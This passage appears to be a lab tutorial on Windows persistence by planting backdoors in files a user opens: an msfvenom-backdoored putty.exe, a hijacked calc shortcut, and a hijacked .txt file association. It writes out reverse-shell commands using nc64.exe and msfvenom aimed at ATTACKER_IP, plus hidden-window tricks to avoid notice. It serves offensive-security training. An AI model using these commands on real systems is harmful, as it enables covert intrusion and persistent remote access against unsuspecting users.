Another method of establishing persistence consists of tampering with some files we know the user interacts with regularly. By performing some modifications to such files, we can plant backdoors that will get executed whenever the user accesses them. Since we donโt want to create any alerts that could blow our cover, the files we alter must keep working for the user as expected.
While there are many opportunities to plant backdoors, we will check the most commonly used ones.
Executable Files
If you find any executable laying around the desktop, the chances are high that the user might use it frequently. Suppose we find a shortcut to PuTTY lying around. If we checked the shortcutโs properties, we could see that it (usually) points to C:\Program Files\PuTTY\putty.exe. From that point, we could download the executable to our attackerโs machine and modify it to run any payload we wanted.
You can easily plant a payload of your preference in any .exe file with msfvenom. The binary will still work as usual but execute an additional payload silently by adding an extra thread in your binary. To create a backdoored putty.exe, we can use the following command:
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exeThe resulting puttyX.exe will execute a reverse_tcp meterpreter payload without the user noticing it. While this method is good enough to establish persistence, letโs look at other sneakier techniques.
Shortcut Files
If we donโt want to alter the executable, we can always tamper with the shortcut file itself. Instead of pointing directly to the expected executable, we can change it to point to a script that will run a backdoor and then execute the usual program normally.
For this task, letโs check the shortcut to calc on the Administratorโs desktop. If we right-click it and go to properties, weโll see where it is pointing:
Before hijacking the shortcutโs target, letโs create a simple Powershell script in C:\Windows\System32 or any other sneaky location. The script will execute a reverse shell and then run calc.exe from the original location on the shortcutโs properties:
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4445"
C:\Windows\System32\calc.exeFinally, weโll change the shortcut to point to our script. Notice that the shortcutโs icon might be automatically adjusted while doing so. Be sure to point the icon back to the original executable so that no visible changes appear to the user. We also want to run our script on a hidden window, for which weโll add the -windowstyle hidden option to Powershell. The final target of the shortcut would be:
powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1
Letโs start an nc listener to receive our reverse shell on our attackerโs machine:
user@AttackBox$ nc -lvp 4445If you double-click the shortcut, you should get a connection back to your attackerโs machine. Meanwhile, the user will get a calculator just as expected by them. You will probably notice a command prompt flashing up and disappearing immediately on your screen. A regular user might not mind too much about that, hopefully.
Hijacking File Associations
In addition to persisting through executables or shortcuts, we can hijack any file association to force the operating system to run a shell whenever the user opens a specific file type.
The default operating system file associations are kept inside the registry, where a key is stored for every single file type under HKLM\Software\Classes\. Letโs say we want to check which program is used to open .txt files; we can just go and check for the .txt subkey and find which Programmatic ID (ProgID)ย is associated with it. A ProgID is simply an identifier to a program installed on the system. For .txt files, we will have the following ProgID:
We can then search for a subkey for the corresponding ProgID (also under HKLM\Software\Classes\), in this case,ย txtfile, where we will find a reference to the program in charge of handling .txt files. Most ProgID entries will have a subkey under shell\open\command where the default command to be run for files with that extension is specified:
In this case, when you try to open a .txt file, the system will execute %SystemRoot%\system32\NOTEPAD.EXE %1, where %1 represents the name of the opened file. If we want to hijack this extension, we could replace the command with a script that executes a backdoor and then opens the file as usual. First, letโs create a ps1 script with the following content and save it to C:\Windows\backdoor2.ps1:
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
C:\Windows\system32\NOTEPAD.EXE $args[0]Notice how in Powershell, we have to pass $args[0] to notepad, as it will contain the name of the file to be opened, as given through %1.
Now letโs change the registry key to run our backdoor script in a hidden window:
Finally, create a listener for your reverse shell and try to open any .txt file on the victim machine (create one if needed). You should receive a reverse shell with the privileges of the user opening the file.